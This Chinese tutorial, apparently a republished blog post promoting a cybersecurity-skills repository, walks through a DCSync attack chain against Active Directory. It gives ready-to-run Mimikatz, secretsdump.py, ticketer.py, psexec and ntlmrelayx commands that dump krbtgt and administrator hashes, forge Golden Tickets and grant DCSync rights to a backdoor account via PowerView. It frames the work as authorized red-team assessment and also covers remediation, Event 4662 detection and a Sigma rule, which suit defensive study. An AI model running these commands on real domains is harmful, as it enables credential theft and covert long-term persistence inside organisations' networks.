使用 DCSync 报告模板构建域持久化攻击链:从凭据提取到 Golden Ticket 的实战指南

发布时间:2026/9/12 1:49:28

使用 DCSync 报告模板构建域持久化攻击链:从凭据提取到 Golden Ticket 的实战指南 使用 DCSync 报告模板构建域持久化攻击链从凭据提取到 Golden Ticket 的实战指南【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills本指南以 Anthropic-Cybersecurity-Skills 仓库中conducting-domain-persistence-with-dcsync技能附带的 DCSync 攻击报告模板 为骨架完整展开 DCSync 攻击的四个核心环节目标域信息记录、凭据提取、持久化机制确认与修复建议。读者完成阅读后将掌握一套可直接复制到授权红队评估中的攻击流程——包括如何枚举具备复制权限的账户、用 Mimikatz 与 Impacket 执行 DCSync、伪造 Golden Ticket以及如何用仓库配套的检测脚本与报告模板沉淀完整证据链。为什么需要一份 DCSync 攻击报告模板DCSync 是滥用 Microsoft 目录复制服务远程协议MS-DRSR的攻击技术攻击者伪装成域控制器DC向目标 DC 请求密码数据。该技术由 Mimikatz 作者 Benjamin Delpy 与 Vincent Le Toux 提出其核心是利用DS-Replication-Get-Changes与DS-Replication-Get-Changes-All两项扩展权限。任何持有这些权限的主体用户或计算机账户都能复制域内任意账户的密码哈希包括 KRBTGT 账户——拿到 KRBTGT 哈希即可伪造 Golden Ticket实现无期限的域持久化。该技术被归类为 MITRE ATTCK T1003.006是 APT28Fancy Bear、APT29Cozy Bear、FIN6 等组织常用的后渗透手段依据 SKILL.md。在授权评估中攻击成功不等于任务完成。红队需要把攻击链条、凭据、持久化机制、检测盲区与修复建议沉淀为结构化记录才能支撑后续报告编写、紫队检测验证与客户修复。这正是模板存在的价值四张表分别回答打的是哪、拿到了什么、凭什么持久、怎么修。模板全景四张表构成完整攻击闭环模板template.md共四部分部分记录内容对应攻击阶段Target Domain域、域 SID、DC 目标、攻击源账户、所用工具侦察与执行Extracted Credentials账户、类型、NT Hash、明文、持久化价值凭据提取Persistence MechanismsGolden Ticket / DCSync 权限 / Silver Ticket 状态持久化建立Remediation修复动作与优先级收尾与移交下面逐表结合实操展开。第一部分Target Domain —— 记录攻击上下文模板要求记录五个字段Domain目标域、Domain SID域 SID伪造 Golden Ticket 的必需参数、DC Target目标域控制器、Attack Source Account攻击源账户、Tool Used工具默认 Mimikatz / secretsdump.py。域 SID 与 KRBTGT 哈希是 Golden Ticket 的两个核心输入。伪造时 Mimikatz 需要完整的S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX格式因此务必在此处留存避免后续补查。工具选择上Windows 侧用 Mimikatz 的lsadump::dcsyncLinux 侧用 Impacket 的secretsdump.py两者攻击效果等价区别在于运行平台与执行环境见 SKILL.md 的完整命令。第二部分Extracted Credentials —— 凭据的优先级排序模板将凭据分为四类并标注其持久化价值账户类型持久化价值krbtgt服务账户无明文Golden Ticket域内无期限访问Administrator域管理员无明文直接 DA 访问扩展来看依据 SKILL.md 的Critical Hashes to Extract表完整提取策略还包含服务账户哈希用于域内横向移动计算机账户哈希用于伪造 Silver Ticket实现服务级身份冒充。提取命令如下# 提取 KRBTGTGolden Ticket 关键 mimikatz.exe lsadump::dcsync /domain:domain.local /user:krbtgt # 提取域管理员 mimikatz.exe lsadump::dcsync /domain:domain.local /user:administrator # 导出全部域账户CSV 格式 mimikatz.exe lsadump::dcsync /domain:domain.local /all /csvLinux 侧 secretsdump.py 的等价操作# 导出全部凭据 secretsdump.py domain.local/admin:Password12310.10.10.1 # 仅导出指定用户 secretsdump.py -just-dc-user krbtgt domain.local/admin:Password12310.10.10.1 # 仅导出 NTLM 哈希不含 Kerberos 密钥 secretsdump.py -just-dc-ntlm domain.local/admin:Password12310.10.10.1 # 使用 Kerberos 票据认证无密码 export KRB5CCNAMEadmin.ccache secretsdump.py -k -no-pass domain.local/adminDC01.domain.local源码支撑secretsdump 输出的自动化解析仓库配套脚本 process.py 专门解析 secretsdump.py 输出它通过正则^(.?):([\d]):([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::匹配 NTDS 哈希行提取用户名、RID、LM 哈希与 NT 哈希并自动分类以$结尾的账户归为机器账户krbtgt与administrator被单独标记为最高风险哈希CLEARTEXT:行被识别为明文密码。运行方式python3 process.py secretsdump_output.txt脚本还会输出完整的 DCSync Credential Analysis Report包含哈希总数、口令复用分析自动跳过空密码哈希31d6cfe0d16ae931b73c59d7e0c089c0、明文密码清单以及四类持久化机会提示Golden Ticket、Silver Ticket、Pass-the-Hash、离线口令破解见 process.py。这正好对应模板表中Persistence Value列的填写依据。第三部分Persistence Mechanisms —— 三种持久化手段的确认模板要求对三种持久化机制逐项打勾Golden Ticket 是否创建、DCSync 权限是否授予并记录授权账户、Silver Ticket 是否创建并记录服务。3.1 Golden Ticket用 KRBTGT 哈希换取无期限域访问拿到 KRBTGT NT 哈希后在 Windows 侧用 Mimikatz 伪造# 基础 Golden Ticket立即注入内存/ptt mimikatz.exe kerberos::golden /user:administrator /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash /ptt # 指定组归属512Domain Admins, 513Domain Users, 518Schema Admins, 519Enterprise Admins, 520Group Policy Creators Owners mimikatz.exe kerberos::golden /user:fakeadmin /domain:domain.local \ /sid:S-1-5-21-XXXXXXXXXX \ /krbtgt:krbtgt_ntlm_hash \ /groups:512,513,518,519,520 /pttLinux 侧用 Impacket ticketer.py# 创建 Golden Ticket ticketer.py -nthash krbtgt_ntlm_hash -domain-sid S-1-5-21-XXXXXXXXXX \ -domain domain.local administrator # 使用票据访问 DC export KRB5CCNAMEadministrator.ccache psexec.py -k -no-pass domain.local/administratorDC01.domain.local依据 workflows.md 的 Golden Ticket 生命周期说明票据由 KRBTGT 哈希 域 SID 生成默认具备约 10 年有效期它能扛过普通密码重置只有双重 KRBTGT 重置两次重置间隔 10 小时以上才能将其作废——这也是模板修复表中第一项动作的由来。3.2 DCSync 权限持久化把复制权限授权给受控账户比金票更隐蔽的持久化思路在域内创建一个低可见度账户并授予其DS-Replication-Get-Changes-All权限此后该账户可独立执行 DCSync。# PowerView为目标账户授予 DCSync 权限 Add-DomainObjectAcl -TargetIdentity DCdomain,DClocal \ -PrincipalIdentity backdoor_user -Rights DCSync # 验证权限已生效 Get-DomainObjectAcl -SearchBase DCdomain,DClocal -ResolveGUIDs | Where-Object { $_.SecurityIdentifier -match backdoor_user_SID }也可用 ntlmrelayx.py 通过中继自动完成权限提升ntlmrelayx.py -t ldap://DC01.domain.local --escalate-user backdoor_user3.3 源码支撑用 ldap3 审计复制权限持有者仓库的 agent.py 实现了权限审计的自动化它通过 ldap3 以 NTLM 绑定域控先查询域对象的nTSecurityDescriptor再用adminCount1过滤器枚举高权限用户标记出潜在的 DCSync 权限持有者。python3 agent.py --server DC_IP --domain corp.local \ --username bind_user --password pass [--log-file events.json] [--output report.json]其底层依赖见 api-reference.md及安装方式库安装用途ldap3pip install ldap3AD 目录查询权限枚举impacketpip install impacketsecretsdump.py 等网络协议工具pyadpip install pyadWindows 侧 AD 接口检测 DCSync 的三个关键复制 GUID 定义在 agent.py 与 process.pyGUID权限1131f6aa-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes1131f6ad-9c07-11d1-f79f-00c04fc2dcd2DS-Replication-Get-Changes-All89e95b76-444d-4c62-991a-0facbeda640cDS-Replication-Get-Changes-In-Filtered-Set3.4 攻击链全景依据 workflows.md 的完整攻击链1. 前置条件 ├── 域管理员或具备复制权限的账户 ├── 到域控的网络可达TCP/135动态 RPC └── 工具MimikatzWindows或 secretsdump.pyLinux 2. 凭据提取 ├── 提取 KRBTGT 哈希Golden Ticket 能力 ├── 提取 Administrator 哈希即时 DA 访问 ├── 提取全部域哈希完整转储 └── 提取服务账户哈希横向移动 3. Golden Ticket 持久化 ├── 用 KRBTGT 哈希伪造金票 ├── 自定义用户、SID 与组归属 ├── 导入当前会话 └── 访问域内任意资源 4. DCSync 权限持久化 ├── 在 AD 中创建低可见度账户 ├── 授予 DS-Replication-Get-Changes-All 权限 ├── 用 ACL 枚举验证权限 └── 该账户可独立执行 DCSync第四部分Remediation —— 收尾移交与修复优先级模板的修复表给出了四项动作与优先级动作优先级双重 KRBTGT 密码重置两次间隔 10 小时Critical审计具备复制权限的账户Critical为复制 GUID 启用 Event 4662 日志High部署 DRSUAPI 流量监控High双重重置的间隔要求有明确依据域内每台 DC 都会缓存 KRBTGT 密码的历史版本以处理复制延迟若两次重置间隔太短攻击者仍可用旧哈希伪造票据因此两次重置之间必须留出至少 10 小时的复制收敛窗口见 workflows.md。检测签名让报告中的证据可验证模板的修复环节离不开检测验证。SKILL.md 的 Detection Signatures 表提供了五类可落地的检测指标SKILL.md指标检测方法来自非 DC 源的 DrsGetNCChanges RPC 调用监控 DRSUAPI 流量来源 IP含 Replicating Directory Changes GUID 的 Event 4662DC 上 Windows 安全日志1131f6aa-/1131f6ad- GUID带 Golden Ticket 异常的 Event 4624不可能存在的 SID 或不存在用户的登录事件域根对象 ACL 修改Event 5136目录服务变更复制流量突增网络基线偏差监控仓库 agent.py 的detect_dcsync_events函数可直接消费 JSON 格式的事件日志导出命中 4662/4624 事件中的复制 GUID 时标记为 CRITICAL其generate_sigma_rule函数还会生成生产级 Sigma 检测规则{ title: DCSync Attack Detected via Directory Replication, detection: { selection: {EventID: 4662, Properties|contains: [ 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2]}, filter: {SubjectUserName|endswith: $}, condition: selection and not filter }, level: critical, tags: [attack.credential_access, attack.t1003.006] }这条规则的完整实现见 agent.py其中以用户名不以$结尾过滤掉 DC 自身的正常复制行为是区分合法复制与攻击的关键逻辑。验证标准报告交付前的自检清单模板最终应服务于交付。SKILL.md 的 Validation CriteriaSKILL.md提供了 8 项自检具备 DCSync 权限的账户已枚举通过 DCSync 提取到 KRBTGT 哈希全部域凭据成功转储Golden Ticket 已伪造并验证 DA 访问DCSync 权限持久化机制已建立若在范围内用 Golden Ticket 验证了对域控的访问证据已记录哈希值与时间戳已提供修复建议双重 KRBTGT 重置、ACL 审计从模板到实战完整使用流程综合模板四张表与仓库配套资源一次规范化的 DCSync 持久化评估应遵循侦察用 PowerView / BloodHound CypherMATCH (u)-[:DCSync|GetChanges|GetChangesAll*1..]-(d:Domain) RETURN u.name, d.name或findDelegation.py枚举复制权限持有者默认关注 Domain Admins、Enterprise Admins、Domain Controllers 组、DC 上的 SYSTEM见 SKILL.md提取Mimikatz 或 secretsdump.py 提取凭据process.py自动解析与归类持久化伪造 Golden TicketMimikatz / ticketer.py或授予受控账户 DCSync 权限检测验证agent.py分析事件日志、生成 Sigma 规则确认检测盲区填表交付将上述结果按模板四张表结构化输出附哈希值、时间戳与修复优先级。该技能在仓库中映射到 MITRE ATTCK 的多个技术节点见 mappings/attack-navigator-layer.json 中 T1003.006、T1558.001、T1098 等相关条目并关联 NIST CSF 的 ID.RA-01 / GV.OV-02 / DE.AE-07 与 D3FEND 的网络流量分析、平台监控等防御技术见 SKILL.md。红队成员可将其作为攻击执行的脚手架蓝队则可用同一套命令与脚本反向验证检测覆盖面——这正是本模板与配套脚本的完整价值所在。【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
延伸阅读

更多相关文章

2026/9/12 1:44:27

Python+PyQt5开发智能文件检索工具

1. 为什么我们需要一个文件智能查找工具?在日常办公中,文件检索是个高频且令人头疼的问题。Windows自带的搜索功能效率低下,经常出现"明明文件就在那里却搜不出来"的情况。我曾在一次项目汇报前,花了整整15分钟寻找一个…

2026/9/12 4:34:47

Java StringEntry接口设计与实现最佳实践

1. StringEntry接口的设计背景与核心诉求在软件开发中,数据结构的抽象与封装一直是提升代码复用性和可维护性的关键手段。StringEntry这个接口概念的提出,本质上是为了解决字符串类型数据在多种场景下的统一操作问题。我最近在重构一个历史遗留系统时&am…

2026/9/12 4:34:47

海光DCU接入K8s:整卡、共享与vDCU调度实战解析

如果你接过“把一批海光 DCU 节点接进 Kubernetes,再让上层 AI 平台和 DeepSeek 推理服务跑起来”这种需求,第一反应大概率是:装个驱动、部署个 Device Plugin 不就行了?真动手之后才会发现,整卡、共享、vDCU 虚拟化是…

2026/9/12 4:34:47

2026年软考高级系统分析师论文备考指南与高分技巧

1. 2026年软考高级系统分析师论文备考指南作为国内IT领域最具含金量的职业资格认证之一,软考高级系统分析师(以下简称"系分")的论文环节一直是考生面临的"拦路虎"。不同于选择题和案例分析,论文写作不仅需要扎…

2026/9/12 4:34:47

Linux下TFTP服务器安装配置与优化指南

1. Linux下TFTP服务器的安装与配置指南在嵌入式开发和网络设备维护领域,TFTP(Trivial File Transfer Protocol)作为轻量级文件传输协议,因其实现简单、资源占用少的特点,成为固件更新、配置文件传输的标配工具。不同于…

2026/9/12 4:34:47

ThinkPHP在线客服系统实战:多坐席分配与部署调优全解析

简介:基于ThinkPHP框架打造的运营级在线客服系统源码,面向需要快速搭建网页客服、多坐席协作与智能客服平台的开发者和企业技术团队,可直接用于电商、官网、SaaS产品等场景的客户服务模块。系统包含实时聊天、坐席状态管理、访客分配、智能自…

2026/9/12 4:29:47

PyMC 采样与推断方法实战指南:MCMC、变分推断与诊断调优

PyMC 采样与推断方法实战指南:MCMC、变分推断与诊断调优 【免费下载链接】scientific-agent-skills Turn any AI agent into an AI Scientist. The #1 Agent Skills library for science, used by 190,000 scientists worldwide. 165 ready-to-use validated skills…

2026/9/12 2:05:33

超人会飞不算本事:系统稳定依赖清晰规则与边界设计

开头先不绕弯子。“#斯坦李吐槽dc 所以超人是无缘无故会飞的嘛哈哈哈哈哈哈哈锤哥真是技术人才啊!#雷神 #复联”这类调侃式短标题,第一波冲击力在于它把两个宇宙的角色塞进同一个吐槽箱里,但细想一下就能发现,它真正碰到的根本不是…

2026/9/12 3:55:12

超人VS蜘蛛侠:拆解超级IP的影响力与传播方法论

把“蜘蛛侠 vs 超人”放在 CSDN 上聊,可能很多人第一反应是走错片场了。但如果把这两个角色看成“两个持续运营了 80 多年的文化产品”,你会发现,这场比较本质上是两个不同 IP 策略的长期结果对比:超人赢在定义了整个超级英雄题材…

2026/9/9 16:31:09

基于CNN的调制信号识别:MATLAB实现时频图分类实战

简介:本资源是一套面向通信工程与信号处理方向学习者、研究者的深度学习实践方案,聚焦调制信号自动检测与识别这一典型无线通信任务,解决传统方法依赖人工特征、低信噪比下性能下降等痛点。压缩包共12个文件(10.73MB)&…

2026/9/12 0:04:17

MATLAB仿生优化框架:长鼻浣熊算法多策略融合实现

简介:本资源是一份面向智能优化算法研究者与MATLAB初学者的仿生智能算法实践代码包,聚焦于长鼻浣熊优化算法(COA)的多策略改进与性能验证。针对传统COA易陷局部最优、收敛精度不足等问题,作者融合Circle映射初始化提升…

2026/9/12 0:04:17

【JAVA毕设源码分享】基于 JavaWeb 的校园一卡通管理系统的设计与实现 基于 JavaWeb 的校园卡业务管理系统(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

2026/9/12 0:04:17

【JAVA毕设源码分享】基于 Java 的图书馆借阅管理平台的搭建与实现 基于 Java 的图书馆综合管理系统(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

2026/9/10 12:32:02

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/10 15:19:50

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/10 15:49:53

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码